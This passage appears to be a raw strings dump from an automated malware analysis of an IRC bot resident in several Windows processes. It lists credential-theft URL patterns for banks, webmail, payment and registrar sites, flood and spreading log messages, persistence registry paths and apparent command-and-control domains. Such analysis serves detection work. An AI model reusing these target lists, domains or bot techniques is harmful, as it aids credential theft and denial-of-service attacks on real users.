>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><p
re>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d 
KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" 
s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%Program Files%\Java\jre6\bin\jqs.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\Program 
Files\Java\jre6\bin\jqs.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>csrss.exe_692_rwx_012D0000_0004E000:</b>
<b>winlogon.exe_716_rwx_012D0000_0004E000:</b>
<b>services.exe_760_rwx_00B70000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG 
t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL 
'%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.mon
eybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s 
hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread 
interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\services.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 
767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\services.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_928_rwx_00A30000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" 
from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploa
ding.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d 
logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS 